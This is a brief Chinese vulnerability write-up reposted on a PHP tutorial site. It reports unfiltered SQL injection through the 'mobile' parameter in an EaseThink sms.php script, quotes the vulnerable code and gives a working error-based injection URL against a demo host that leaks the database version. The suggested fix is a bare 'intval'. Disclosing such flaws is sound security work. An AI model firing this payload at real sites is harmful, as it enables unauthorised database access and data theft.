来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] sms.php中对于手机号码未过滤即代入查询,造成SQL注入if($_REQUEST[#39;act#39;]==#39;subscribe#39;){$tmpl-display(sms_subscribe.html);}elseif($_REQUEST[#39;act#39;]==#39;do_subscribe#39;){/......
sms.php中对于手机号码未过滤即代入查询,造成SQL注入
if($_REQUEST['act']=='subscribe') { $tmpl->display("sms_subscribe.html"); } elseif($_REQUEST['act']=='do_subscribe') { //开始发送验证码 if(check_ipop_limit(get_client_ip(),"sms_send_code",intval(app_conf("SUBMIT_DELAY")))) { $mobile = trim($_REQUEST['mobile']); $verify = md5(trim($_REQUEST['verify'])); $session_verify = $_SESSION['verify']; if($verify!=$session_verify) { $result['type'] = 0; $result['message'] = $GLOBALS['lang']['VERIFY_CODE_ERROR']; ajax_return($result); } $mobile_subscribe = $GLOBALS['db']->getRow("select * from ".DB_PREFIX."mobile_list where mobile='".$mobile."'");
不注释了,一眼看出来没有任何过滤
利用方式: 1. http://demo.easethink.com/sms.php?act=subscribe获得验证码,将其拼接到下一步中的verify中。
2. http://demo.easethink.com/sms.php?act=do_subscribe&verify=8069&mobile=111'and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)%23
修复方案:
intval |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com